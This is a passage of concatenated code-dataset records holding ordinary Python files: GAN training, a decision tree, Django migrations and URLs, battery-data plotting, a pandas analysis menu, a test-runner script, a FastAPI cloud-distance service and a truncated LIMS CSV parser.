tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=dis_logit_real, labels=tf.ones_like(dis_logit_real))) \n self.dis_loss_fake = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=dis_logit_fake, labels=tf.zeros_like(dis_logit_fake))) \n \n ### Loss ###\n self.dec_loss = self.dec_loss_fake\n self.dis_loss = self.dis_loss_real + self.dis_loss_fake\n\n ### Theta ###\n dec_theta = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope='dec')\n dis_theta = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope='dis')\n\n ### Solver ###\n self.dec_solver = tf.train.AdamOptimizer(self.learning_rate).minimize(self.dec_loss, var_list=dec_theta)\n self.dis_solver = tf.train.AdamOptimizer(self.learning_rate).minimize(self.dis_loss, var_list=dis_theta)\n\n\n def train_using_info(self, logger, sess, batch_xs, batch_ys, epoch_idx, batch_idx, batch_total, log_flag, keep_prob):\n random_z = get_random_normal(batch_xs.shape[0], self.z_dim)\n\n for i in range(5):\n _, dis_loss_val = sess.run([self.dis_solver, self.dis_loss], feed_dict={self.X: batch_xs, self.y: batch_ys, self.keep_prob: keep_prob, self.z: random_z})\n _, dec_loss_val = sess.run([self.dec_solver, self.dec_loss], feed_dict={self.y: batch_ys, self.keep_prob: keep_prob, self.z: random_z})\n\n total_loss_val = dis_loss_val + dec_loss_val\n if log_flag == True:\n logger.debug('Epoch %.3i, Batch[%.3i/%i], Dis loss : %.4E, Dec loss : %.4E, Train loss: %.4E' % (epoch_idx, batch_idx + 1, batch_total, dis_loss_val, dec_loss_val, total_loss_val))\n\n return total_loss_val\n\n def inference_using_info(self, logger, sess, batch_xs, batch_ys, epoch_idx, batch_idx, batch_total, log_flag, keep_prob):\n random_z = get_random_normal(batch_xs.shape[0], self.z_dim)\n\n dis_loss_val, dec_loss_val = sess.run([self.dis_loss, self.dec_loss], feed_dict={self.X: batch_xs, self.y: batch_ys, self.keep_prob: keep_prob, self.z: random_z})\n\n total_loss_val = dis_loss_val + dec_loss_val\n if log_flag == True:\n logger.debug('Epoch %.3i, Batch[%.3i/%i], Dis loss : %.4E, Dec loss : %.4E, Valid loss: %.4E' % (epoch_idx, batch_idx + 1, batch_total, dis_loss_val, dec_loss_val, total_loss_val))\n\n return total_loss_val\n\n def inference_with_output_using_info(self, logger, sess, batch_xs, batch_ys, epoch_idx, batch_idx, batch_total, log_flag, keep_prob):\n random_z = get_random_normal(batch_xs.shape[0], self.z_dim)\n\n dis_loss_val, dec_loss_val, output_val = sess.run([self.dis_loss, self.dec_loss, self.output], feed_dict={self.X: batch_xs, self.y: batch_ys, self.keep_prob: keep_prob, self.z: random_z})\n\n total_loss_val = dis_loss_val + dec_loss_val\n if log_flag == True:\n logger.debug('Epoch %.3i, Batch[%.3i/%i], Dis loss : %.4E, Dec loss : %.4E, Test loss: %.4E' % (epoch_idx, batch_idx + 1, batch_total, dis_loss_val, dec_loss_val, total_loss_val))\n\n return total_loss_val, output_val\n","sub_path":"info_gan.py","file_name":"info_gan.py","file_ext":"py","file_size_in_byte":4780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"400296544","text":"import numpy as np\nfrom sklearn.base import BaseEstimator\n\n__version__ = '0.1'\n\n\ndef _proba(y):\n \"\"\" Array of relative frequencies of the unique values. \"\"\"\n N = len(y)\n _, counts = np.unique(y, return_counts=True)\n return counts / N\n\n\ndef entropy(y):\n \"\"\" A way to measure impurity \"\"\"\n p = _proba(y)\n return (-p * np.log2(p)).sum()\n\n\ndef gini(y):\n \"\"\" A criterion to minimize the probability of misclassification \"\"\"\n p = _proba(y)\n return 1.0 - sum(list(map(lambda x: x * x, p)))\n\n\ndef variance(y):\n return np.var(y)\n\n\ndef mad_median(y):\n median = np.median(y)\n X = len(y)\n return sum(list(map(lambda x: abs(x - median), y))) / X\n\n\nclass DecisionTreeNode:\n def __init__(self, depth=-1):\n self.depth = depth\n self.left = None\n self.right = None\n self.threshold = None\n self.split_feature_index = None\n self.is_leaf = False\n self.prediction = None\n\n self.stats = []\n self.score = np.inf\n\n def make_leaf(self, prediction):\n self.is_leaf = True\n self.prediction = prediction\n\n def __str__(self):\n result = \"\\n\" + \" \" * 3 * self.depth\n if self.is_leaf:\n result += f\"Prediction: {self.prediction}\"\n else:\n result += f\"(Feature: {self.split_feature_index}; Threshold: {self.threshold};)\"\n\n result += \" Score: \" + str(self.score)\n result += \" Stats: \" + str(self.stats)\n\n if not self.is_leaf:\n result += str(self.left)\n result += str(self.right)\n return result\n\n\nclass DecisionTree(BaseEstimator):\n \"\"\"\n Decision Tree\n Parameters\n ----------\n max_depth : int, optional\n Maximum depth of trees\n criterion : string, optional\n Split criterion. Valid values are 'entropy', 'gini', 'variance', 'mad_median'.\n min_samples_split : int, optional\n \"\"\"\n\n CRITERION_MAP = {\n 'entropy': entropy,\n 'gini': gini,\n 'variance': variance,\n 'mad_median': mad_median\n }\n\n def __init__(self, max_depth=np.inf, min_samples_split=2,\n criterion='gini', debug=False):\n if max_depth != np.inf and not isinstance(max_depth, int):\n raise ValueError(f\"max_depth must be integer, but (type{max_depth}) given\")\n\n if max_depth < 1:\n raise ValueError(f\"max_depth must be >= 1\")\n\n if not isinstance(min_samples_split, int):\n raise ValueError(f\"min_samples_split must be integer, but (type{min_samples_split}) given\")\n\n if criterion not in DecisionTree.CRITERION_MAP:\n raise ValueError(f\"Unknown criterion given.\", \"Expected one of:\", *DecisionTree.CRITERION_MAP.keys(),\n f\"But {criterion} given.\")\n\n self.max_depth = max_depth\n self.min_samples_split = min_samples_split\n self.criterion = criterion\n self.debug = debug\n\n self.root = None\n\n self.is_classification = criterion in ['entropy', 'gini']\n self.classes = []\n\n def fit(self, X, y):\n\n if len(y.shape) != 1:\n raise ValueError(f\"y must have only 1 dimension\")\n\n if X.shape[0] != y.shape[0]:\n raise ValueError(f\"y and X must have same length\")\n\n if self.is_classification:\n self.classes = sorted(list(set(y)))\n\n self.root = self._build(X, y)\n\n def predict(self, X):\n return np.array([self._estimate(x) for x in X])\n\n def predict_proba(self, X):\n \"\"\"Predict class probabilities of the input samples X.\"\"\"\n if not self.is_classification:\n raise Exception(\"predict_proba is only for classification tree\")\n\n return np.array([self._proba(x) for x in X])\n\n def _build(self, X, y, depth: int = 0) -> DecisionTreeNode:\n if self._stop_criteria(X, y, depth):\n return self._create_leaf(X, y, depth)\n\n node = DecisionTreeNode(depth)\n\n if self.debug:\n classes, counts = np.unique(y, return_counts=True)\n stats = list(zip(classes, counts))\n sorted_stats = sorted(stats, key=lambda x: x[1], reverse=True)\n node.stats = sorted_stats\n\n node.score = self._score(X, y)\n\n split_feature_index, threshold = self._find_best_split(X, y)\n node.split_feature_index = split_feature_index\n node.threshold = threshold\n\n left_mask = X[:, split_feature_index] < threshold\n\n node.left = self._build(X[left_mask], y[left_mask], depth + 1)\n node.right = self._build(X[~left_mask], y[~left_mask], depth + 1)\n return node\n\n def _create_leaf(self, X, y, depth):\n node = DecisionTreeNode(depth)\n\n if self.is_classification:\n classes, counts = np.unique(y, return_counts=True)\n stats = list(zip(classes, counts))\n sorted_stats = sorted(stats, key=lambda x: x[1], reverse=True)\n prediction = sorted_stats[0][0]\n node.stats = sorted_stats\n else:\n prediction = sum(y) / len(y)\n\n node.make_leaf(prediction=prediction)\n node.score = self._score(X, y)\n return node\n\n def _stop_criteria(self, X, y, depth):\n if depth > self.max_depth:\n return True\n\n if len(np.unique(y)) == 1:\n return True\n\n if len(y) < self.min_samples_split:\n return True\n\n return False\n\n def _estimate(self, x):\n current_node = self.root\n while not current_node.is_leaf:\n if x[current_node.split_feature_index] < current_node.threshold:\n current_node = current_node.left\n else:\n current_node = current_node.right\n return current_node.prediction\n\n def _proba(self, x):\n current_node = self.root\n while not current_node.is_leaf:\n if x[current_node.split_feature_index] < current_node.threshold:\n current_node = current_node.left\n else:\n current_node = current_node.right\n\n stats = current_node.stats\n\n node_samples_count = sum(map(lambda x: x[1], stats))\n raw_result = list(map(lambda x: (x, 0.0), self.classes))\n\n for class_name, count in stats:\n index = raw_result.index((class_name, 0))\n raw_result[index] = (class_name, count)\n\n result = np.array(list(map(lambda x: x[1], raw_result))) / node_samples_count\n return result\n\n def _find_best_split(self, X, y):\n best_feature_index = None\n best_feature_threshold = None\n best_score = -np.inf\n best_uniformity = 0\n\n for feature_index in range(X.shape[1]):\n feature_column = X[:, feature_index]\n\n for threshold in list(set(feature_column)):\n score, uniformity = self._split_score(X, y, feature_index, threshold)\n if score > best_score and uniformity > best_uniformity:\n best_score = score\n best_feature_index = feature_index\n best_feature_threshold = threshold\n best_uniformity = uniformity\n\n return best_feature_index, best_feature_threshold\n\n def _score(self, X, y):\n fn = DecisionTree.CRITERION_MAP[self.criterion]\n\n score = fn(y)\n return score\n\n def _split_score(self, dataset, y, feature_index, threshold):\n mask = dataset[:, feature_index] < threshold\n\n left = y[mask]\n right = y[~mask]\n\n default_score = -np.inf\n default_uniformity = 0\n\n if len(left) == 0 or len(right) == 0:\n return default_score, default_uniformity\n\n fn = DecisionTree.CRITERION_MAP[self.criterion]\n\n score = fn(y) - len(left) * fn(left) / len(y) - len(right) * fn(right) / len(y)\n\n uniformity = len(left) * len(right)\n\n return score, uniformity\n","sub_path":"ML Course ODS/HW 3 - Tree/Custom tree/decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":7898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"379607544","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('ds9s', '0019_auto_20141210_2339'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='analysis',\n name='value',\n field=models.DecimalField(max_digits=19, decimal_places=6),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='galaxyfeatures',\n name='value',\n field=models.DecimalField(default=None, max_digits=19, decimal_places=6),\n preserve_default=True,\n ),\n ]\n","sub_path":"ds9s/migrations/0020_auto_20141215_1821.py","file_name":"0020_auto_20141215_1821.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"565491673","text":"from django.conf.urls.defaults import patterns, url\nfrom django.contrib.auth.decorators import login_required\nfrom accounts_web.account.views import CreateAccountView, AccountOverviewView\n\nurlpatterns = patterns('',\n\n# url(r'^$', ListAccountsView.as_view(template_name=\"account/list.html\"), name='new-account'),\n url(r'^$',\n login_required(AccountOverviewView.as_view(template_name=\"account/overview.html\")),\n name='account-overview'),\n url(r'^create/$',\n login_required(CreateAccountView.as_view(template_name=\"account/create.html\")),\n name='account-create'),\n\n)\n","sub_path":"accounts_web/account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"334529512","text":"import matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1.inset_locator import inset_axes\n\n\ndef _config(ax, xlabel, ylabel, title=None, loc=None):\n \"\"\"\n Configure labels and appearance of the plot figure.\n \"\"\"\n ax.grid(True, color='0.9')\n ax.set_frame_on(False)\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n ax.tick_params(color='0.9')\n if title is not None:\n ax.set_title(title)\n if loc is not None:\n ax.legend(loc=loc)\n\n\ndef plot_hppc_orig(data):\n \"\"\"\n Plot original HPPC data from battery cell test.\n \"\"\"\n fig, ax = plt.subplots(tight_layout=True)\n ax.plot(data.time, data.current, 'C0')\n _config(ax, 'Time [s]', 'Current [A]')\n\n fig, ax = plt.subplots()\n ax.plot(data.time, data.voltage, 'C3')\n ax.arrow(15474, 4.06, 0, -0.14, head_width=1000, head_length=0.05, zorder=20)\n _config(ax, 'Time [s]', 'Voltage [V]')\n axins = inset_axes(ax, 2, 2, loc='lower left', borderpad=4)\n axins.plot(data.time, data.voltage, 'C3')\n axins.set_xlim(15420, 15540)\n axins.set_ylim(4.08, 4.21)\n plt.xticks(visible=False)\n plt.yticks(visible=False)\n\n fig, ax1 = plt.subplots(tight_layout=True)\n ax1.plot(data.time, data.current, 'C0')\n ax1.set_xlabel('Time [s]')\n ax1.set_ylabel('Current [A]', color='C0')\n ax1.tick_params('y', colors='C0')\n ax1.set_frame_on(False)\n ax2 = ax1.twinx()\n ax2.plot(data.time, data.voltage, 'C3')\n ax2.set_ylabel('Voltage [V]', color='C3')\n ax2.tick_params('y', colors='C3')\n ax2.set_frame_on(False)\n\n\ndef plot_hppc_proc(data):\n \"\"\"\n Plot processed HPPC data from battery cell test.\n \"\"\"\n ids = data.get_ids()\n idq = data.get_idq()\n idrc = data.get_idrc()\n\n fig, ax = plt.subplots(tight_layout=True)\n ax.plot(data.time, data.current, 'C0')\n ax.plot(data.time[ids], data.current[ids], 'x', label='ids')\n ax.plot(data.time[idq], data.current[idq], 'x', label='idq')\n _config(ax, 'Time [s]', 'Current [A]', loc='best')\n\n fig, ax = plt.subplots(tight_layout=True)\n ax.plot(data.time, data.voltage, 'C3')\n ax.plot(data.time[ids], data.voltage[ids], 'x', label='ids')\n ax.plot(data.time[idq], data.voltage[idq], 'x', label='idq')\n ax.plot(data.time[idrc[0]], data.voltage[idrc[0]], 'o', alpha=0.8, mew=0, label='id0')\n ax.plot(data.time[idrc[1]], data.voltage[idrc[1]], 'o', alpha=0.8, mew=0, label='id1')\n ax.plot(data.time[idrc[2]], data.voltage[idrc[2]], 'o', alpha=0.8, mew=0, label='id2')\n ax.plot(data.time[idrc[3]], data.voltage[idrc[3]], 'o', alpha=0.8, mew=0, label='id3')\n ax.plot(data.time[idrc[4]], data.voltage[idrc[4]], 'o', alpha=0.8, mew=0, label='id4')\n _config(ax, 'Time [s]', 'Voltage [V]', loc='best')\n\n\ndef plot_discharge_orig(data):\n \"\"\"\n Plot original discharge data from battery cell test.\n \"\"\"\n ids = data.get_ids()\n id0, id1, id2, id3 = data.get_idx()\n\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(12, 4.8), tight_layout=True)\n ax1.plot(data.time, data.current, 'C0', label='data')\n ax1.plot(data.time[ids], data.current[ids], 'x', label='ids')\n ax1.plot(data.time[id0], data.current[id0], 'o', alpha=0.8, mew=0, label='id0')\n ax1.plot(data.time[id1], data.current[id1], 'o', alpha=0.8, mew=0, label='id1')\n ax1.plot(data.time[id2], data.current[id2], 'o', alpha=0.8, mew=0, label='id2')\n ax1.plot(data.time[id3], data.current[id3], 'o', alpha=0.8, mew=0, label='id3')\n ax2.plot(data.time, data.voltage, 'C3', label='data')\n ax2.plot(data.time[ids], data.voltage[ids], 'x', label='ids')\n ax2.plot(data.time[id0], data.voltage[id0], 'o', alpha=0.8, mew=0, label='id0')\n ax2.plot(data.time[id1], data.voltage[id1], 'o', alpha=0.8, mew=0, label='id1')\n ax2.plot(data.time[id2], data.voltage[id2], 'o', alpha=0.8, mew=0, label='id2')\n ax2.plot(data.time[id3], data.voltage[id3], 'o', alpha=0.8, mew=0, label='id3')\n _config(ax1, 'Time [s]', 'Current [A]', loc='best')\n _config(ax2, 'Time [s]', 'Voltage [V]', loc='best')\n\n fig, ax1 = plt.subplots(tight_layout=True)\n ax1.plot(data.time, data.current, 'C0')\n ax1.set_xlabel('Time [s]')\n ax1.set_ylabel('Current [A]', color='C0')\n ax1.tick_params('y', colors='C0')\n ax1.set_frame_on(False)\n ax2 = ax1.twinx()\n ax2.plot(data.time, data.voltage, 'C3')\n ax2.set_xlabel('Time [s]')\n ax2.set_ylabel('Voltage [V]', color='C3')\n ax2.tick_params('y', colors='C3')\n ax2.set_frame_on(False)\n\n\ndef plot_discharge_proc(data):\n \"\"\"\n Plot processed discharge data from battery cell test.\n \"\"\"\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(12, 4.8), tight_layout=True)\n ax1.plot(data.time, data.current, 'C0')\n ax2.plot(data.time, data.voltage, 'C3')\n _config(ax1, 'Time [s]', 'Current [A]')\n _config(ax2, 'Time [s]', 'Voltage [V]')\n\n\ndef plot_temp_orig(data):\n \"\"\"\n Plot original temperature data from battery cell test.\n \"\"\"\n fig, ax = plt.subplots(tight_layout=True)\n ax.plot(data.time, data.tc1, label='tc1')\n ax.plot(data.time, data.tc2, label='tc2')\n ax.plot(data.time, data.tc3, label='tc3')\n ax.plot(data.time, data.tc4, label='tc4')\n ax.axvspan(data.time[data.id0], data.time[data.id1], facecolor='0.9', label='section')\n _config(ax, 'Time [s]', 'Temperature [°C]', loc='best')\n\n\ndef plot_temp_proc(data):\n \"\"\"\n Plot processed temperature data from battery cell test.\n \"\"\"\n fig, ax = plt.subplots(tight_layout=True)\n ax.plot(data.time, data.tc1, label='tc1')\n ax.plot(data.time, data.tc2, label='tc2')\n ax.plot(data.time, data.tc3, label='tc3')\n ax.plot(data.time, data.tc4, label='tc4')\n _config(ax, 'Time [s]', 'Temperature [°C]', loc='best')\n\n\ndef plot_soc_ocv(data, ocv, soc, i_pts, t_pts, v_pts, z_pts):\n \"\"\"\n Plot SOC and OCV from equivalent circuit model.\n \"\"\"\n fig, ax = plt.subplots(tight_layout=True)\n ax.plot(data.time, data.voltage, 'C3', label='data')\n ax.plot(t_pts, v_pts, 'x', label='ocv pts')\n ax.plot(data.time, ocv, '--', label='ocv')\n _config(ax, 'Time [s]', 'Voltage [V]', loc='best')\n\n fig, ax1 = plt.subplots(tight_layout=True)\n ax1.plot(data.time, data.current, 'C9', label='data')\n ax1.plot(t_pts, i_pts, 'x', label='ocv pts')\n ax1.legend(loc='lower left')\n ax1.set_xlabel('Time [s]')\n ax1.set_ylabel('Current [A]', color='C0')\n ax1.tick_params('y', colors='C0')\n ax1.set_frame_on(False)\n ax2 = ax1.twinx()\n ax2.plot(data.time, soc, 'm', label='soc')\n ax2.plot(t_pts, z_pts, 'xC6', label='soc pts')\n ax2.legend(loc='best')\n ax2.set_ylabel('SOC [-]', color='m')\n ax2.tick_params('y', colors='m')\n ax2.set_frame_on(False)\n\n fig, ax = plt.subplots(tight_layout=True)\n ax.plot(z_pts, v_pts, 'm', marker='x')\n _config(ax, 'State of charge [-]', 'Open circuit voltage [V]')\n\n\ndef plot_curve_fit(data, ecm):\n \"\"\"\n Plot curve fit for one time constant (OTC) and two time constant (TTC)\n functions. Plots are generated for each SOC section in HPPC profile.\n \"\"\"\n coeffs_otc = ecm.curve_fit_coeff(ecm.func_otc, 3)\n coeffs_ttc = ecm.curve_fit_coeff(ecm.func_ttc, 5)\n\n # indices representing start (id2) and end (id4) of curve in each SOC section\n _, _, id2, _, id4 = data.get_idrc()\n\n for i in range(len(id2)):\n start = id2[i]\n end = id4[i]\n t_curve = data.time[start:end]\n v_curve = data.voltage[start:end]\n t_scale = t_curve - t_curve[0]\n\n vfit1 = ecm.func_otc(t_scale, *coeffs_otc[i])\n vfit2 = ecm.func_ttc(t_scale, *coeffs_ttc[i])\n\n fig, ax = plt.subplots()\n ax.plot(t_curve, v_curve, 'C3', marker='.', label='data')\n ax.plot(t_curve, vfit1, label='otc')\n ax.plot(t_curve, vfit2, label='ttc')\n _config(ax, 'Time [s]', 'Voltage [V]', title=f'SOC section {i}', loc='best')\n\n fig, ax = plt.subplots(tight_layout=True)\n ax.plot(data.time, data.voltage, 'C3', label='data')\n ax.plot(data.time[id2], data.voltage[id2], 'x', label='id2')\n ax.plot(data.time[id4], data.voltage[id4], 'x', label='id4')\n _config(ax, 'Time [s]', 'Voltage [V]', loc='best')\n\n\ndef plot_v_ecm(data, v_ecm):\n \"\"\"\n Plot HPPC voltage data and ECM voltage. Plot absolute voltage difference\n between HPPC data and ECM.\n \"\"\"\n fig, ax = plt.subplots(tight_layout=True)\n ax.plot(data.time, data.voltage, 'C3', label='data')\n ax.plot(data.time, v_ecm, 'k--', label='ecm')\n _config(ax, 'Time [s]', 'Voltage [V]', loc='best')\n\n fig, ax = plt.subplots(tight_layout=True)\n ax.plot(data.time, abs(data.voltage - v_ecm))\n _config(ax, 'Time [s]', 'Absolute voltage difference [V]')\n\n\ndef show_plots():\n \"\"\"\n Show all plot figures.\n \"\"\"\n plt.show()\n","sub_path":"ecmlib/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":8713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"386251017","text":"\"\"\"\nCreated on Sep 19, 2021\n\nNote: Requires files Housing.CSV and PopChange.csv!\n\nProgram purpose: Use pandas to read data about housing and population from CSV files.\nPerform data analysis on selected columns and display histograms.\n\"\"\"\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\npd.set_option('float_format', '{:.2f}'.format)\n\n\ndef population_data():\n \"\"\" menu to analyze population data \"\"\"\n try:\n population = pd.read_csv('PopChange.csv') # read data from population file\n except FileNotFoundError:\n print(\"\\nFile not found.\") # message if file not found\n else:\n print(\"\\nReading population data.\") # message if file read\n dataframe = population.describe() # create a dataframe for pandas analysis\n while True: # display menu\n print(\"\\n1. Pop Apr 1 \\\n \\n2. Pop Jul 1 \\\n \\n3. Change Pop \\\n \\n4. Return to main menu\")\n try: # prompt user to input column selection and call functions\n selection = int(input(\"\\nSelect the column you want to analyze: \"))\n if selection == 1:\n display_data(dataframe, 'Pop Apr 1') # analyze selected column\n display_histogram(population, 'Pop Apr 1') # display histogram\n elif selection == 2:\n display_data(dataframe, 'Pop Jul 1') # analyze selected column\n display_histogram(population, 'Pop Jul 1') # display histogram\n elif selection == 3:\n display_data(dataframe, 'Change Pop') # analyze selected column\n display_histogram(population, 'Change Pop') # display histogram\n elif selection == 4:\n break # return to main menu\n else:\n print(\"\\nInvalid selection.\") # message if invalid selection\n except ValueError:\n print(\"\\nInvalid selection.\") # message if invalid input\n\n\ndef housing_data():\n \"\"\" menu to analyze housing data \"\"\"\n try:\n housing = pd.read_csv('Housing.csv') # read housing data from file\n except FileNotFoundError:\n print(\"\\nFile not found.\") # message if file not found\n else:\n print(\"\\nReading housing data.\") # message if file read\n dataframe = housing.describe() # create dataframe for housing analysis\n while True: # display menu to analyze housing data\n print(\"\\n1. Age \\\n \\n2. Bedrooms \\\n \\n3. Built \\\n \\n4. Rooms \\\n \\n5. Utility \\\n \\n6. Return to main menu\")\n try: # prompt user to input column selection and call functions\n selection = int(input(\"\\nSelect the column you want to analyze: \"))\n if selection == 1:\n display_data(dataframe, 'AGE') # analyze selected column\n display_histogram(housing, 'AGE') # display histogram\n elif selection == 2:\n display_data(dataframe, 'BEDRMS') # analyze selected column\n display_histogram(housing, 'BEDRMS') # display histogram\n elif selection == 3:\n display_data(dataframe, 'BUILT') # analyze selected column\n display_histogram(housing, 'BUILT') # display histogram\n elif selection == 4:\n display_data(dataframe, 'ROOMS') # analyze selected column\n display_histogram(housing, 'ROOMS') # display histogram\n elif selection == 5:\n display_data(dataframe, 'UTILITY') # analyze selected column\n display_histogram(housing, 'UTILITY') # display histogram\n elif selection == 6:\n break # return to main menu\n else:\n print(\"\\nInvalid selection.\") # message if invalid selection\n except ValueError:\n print(\"\\nInvalid selection.\") # message if invalid input\n\n\ndef display_data(dataset, column):\n \"\"\" display data from csv files \"\"\"\n print(f'\\nYou selected {column}') # display data analysis for each column\n print(f\"\\nThe statistics for this column are: \\\n \\nCount = {dataset[column]['count']:.0f} \\\n \\nMean = {dataset[column]['mean']:,.2f} \\\n \\nStandard Deviation = {dataset[column]['std']:,.1f} \\\n \\nMin = {dataset[column]['min']:,.0f} \\\n \\nMax = {dataset[column]['max']:,.0f}\")\n\n\ndef display_histogram(dataset, column):\n \"\"\" display histogram for selected column \"\"\"\n print(\"\\nThe histogram for this dataset is: \")\n # format histogram excluding extreme outliers\n dataset[column][dataset[column] < 3.1e6][dataset[column] > -5.3e5].hist()\n plt.suptitle(column) # add super title to histogram\n plt.show() # show histogram\n\n\ndef menu():\n \"\"\" display user menu \"\"\"\n print(\"\\nMenu: \")\n while True:\n try: # select population or housing data\n print((\"\\n1. Population Data \\\n \\n2. Housing Data \\\n \\n3. Exit program\"))\n selection = int(input(\"\\nSelect the file you want to analyze: \"))\n if selection == 1:\n population_data() # call function to read population file\n elif selection == 2:\n housing_data() # call function to read housing file\n elif selection == 3:\n print(\"\\nThank you for using the program. Have a nice day!\")\n break # exit program\n else:\n print(\"\\nInvalid selection.\") # message if invalid selection\n except ValueError:\n print(\"\\nInvalid selection.\") # message if invalid input\n\n\n# display welcome message\nprint(\"************ Welcome to the Python Data Analysis App ***********\")\nmenu() # display menu\n","sub_path":"popandhousingdata.py","file_name":"popandhousingdata.py","file_ext":"py","file_size_in_byte":5692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"16610607","text":"import os\nimport subprocess\nimport csv\nfrom collections import defaultdict\n\nreport={}\nques_list = [\"q2\", \"q3\", \"q4\", \"q5\", \"q6\"]\n\nfor q in ques_list:\n os.chdir(q+\"/runner/\")\n for filename in os.listdir(\"exec/\"):\n run_file = filename.split(\"_\")\n run_file = run_file[0]\n f = open(\"reports/\"+run_file+\".txt\", \"w\")\n try:\n subprocess.call([\"exec/\"+filename], stdout=f, timeout=2)\n except subprocess.TimeoutExpired:\n pass\n f.close()\n \n f2 = open(\"cases/\"+run_file+\".txt\", \"w\")\n subprocess.run([\"grep\", \"-c\", \"FAILED\", \"reports/\"+run_file+\".txt\"], stdout=f2)\n f2.close()\n\n f2 = open(\"cases/\"+run_file+\".txt\", \"r\")\n # print(f2.read().split(\"\\n\")[0])\n if (run_file in report):\n report[run_file][q] = f2.read().split(\"\\n\")[0]\n else:\n report[run_file] = {}\n report[run_file][q] = f2.read().split(\"\\n\")[0]\n\n f2.close()\n # break\n # break\n os.chdir(\"../../\")\n \nprint(report)\n\nwith open('report.csv', 'w') as f:\n for entry in report.keys():\n res = [0, 0, 0, 0, 0]\n k = 0\n for q in ques_list:\n if (q in report[entry]):\n res[k] = int(report[entry][q])\n else:\n res[k] = -1\n k += 1\n for i in range(0, len(res)):\n res[i] = str(res[i])\n f.write(\"%s,%s,%s,%s,%s,%s\\n\"%(entry, res[0], res[1], res[2], res[3], res[4]))","sub_path":"4/overall_test.py","file_name":"overall_test.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"33200397","text":"import os\nimport requests\nimport math\nfrom typing import List, Dict, Optional\n\nfrom fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom pydantic import BaseModel\napp = FastAPI()\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"http://localhost:1234\"],\n allow_methods=[\"GET\", \"POST\"],\n allow_headers=[\"*\"],\n)\n\nclass Datacenter(BaseModel):\n cloud_description: str\n cloud_name: str\n geo_region: str\n geo_latitude: float\n geo_longitude: float\n distance: Optional[float]\n\nclass CloudModel(BaseModel):\n userLongitude: float\n userLatitude: float\n clouds: List[Datacenter]\n\n@app.get(\"/get_clouds\")\ndef get_all_clouds():\n \"\"\"\n Get all clouds supported by Aiven from their public REST-API\n \"\"\"\n caching_enabled = os.environ.get(\"CACHING_ENABLED\", False)\n if caching_enabled: # and if result is in cache\n pass # would return a cached response here\n\n res = requests.get(\"https://api.aiven.io/v1/clouds\")\n\n return res.json()\n\n\n@app.post(\"/sort_clouds_by_distance\")\ndef sort_clouds(sortClouds: CloudModel):\n\n def calculate_cloud_distance_from_user(lat1: float, lon1: float, lat2: float, lon2: float) -> float:\n \"\"\"\n Calculates the distance between two points on earth's surface\n given longitude/latitude of those points\n \"\"\"\n dlat = math.radians(lat2 - lat1)\n dlon = math.radians(lon2 - lon1)\n a = (math.sin(dlat / 2) * math.sin(dlat / 2) +\n math.cos(math.radians(lat1)) * math.cos(math.radians(lat2)) *\n math.sin(dlon / 2) * math.sin(dlon / 2))\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n d = round(6371 * c)\n return d\n\n def sort_clouds_by_nearest_distance(cloud_list: List[Datacenter]) -> List[Datacenter]:\n return sorted(cloud_list, key = lambda i: i.distance)\n\n userLatitude = sortClouds.userLatitude\n userLongitude = sortClouds.userLongitude\n cloud_list = sortClouds.clouds\n\n for cloud in cloud_list:\n cloud.distance = calculate_cloud_distance_from_user(\n userLatitude,\n userLongitude,\n cloud.geo_latitude,\n cloud.geo_longitude\n )\n\n sorted_clouds = sort_clouds_by_nearest_distance(cloud_list)\n return {\"clouds\": sorted_clouds}\n","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"295214505","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\" Beckman Couter Access\n\"\"\"\nfrom datetime import datetime\nfrom bika.lims.exportimport.instruments.resultsimport import \\\n AnalysisResultsImporter, InstrumentCSVResultsFileParser\n\nclass BeckmancoulterAccessCSVParser(InstrumentCSVResultsFileParser):\n def __init__(self, csv):\n InstrumentCSVResultsFileParser.__init__(self, csv)\n self._columns = [] # The different columns names\n self._values = {} # The analysis services from the same resid\n self._resid = '' # A stored resid\n self._rownum = None\n self._end_header = False\n\n def _parseline(self, line):\n sline = line.split(',')\n if len(sline) > 0 and not self._end_header:\n self._columns = sline\n self._end_header = True\n return 0\n elif sline > 0 and self._end_header:\n self.parse_data_line(sline)\n else:\n self.err(\"Unexpected data format\", numline=self._numline)\n return -1\n\n def parse_data_line(self, sline):\n \"\"\"\n Parses the data line and builds the dictionary.\n :param sline: a split data line to parse\n :return: 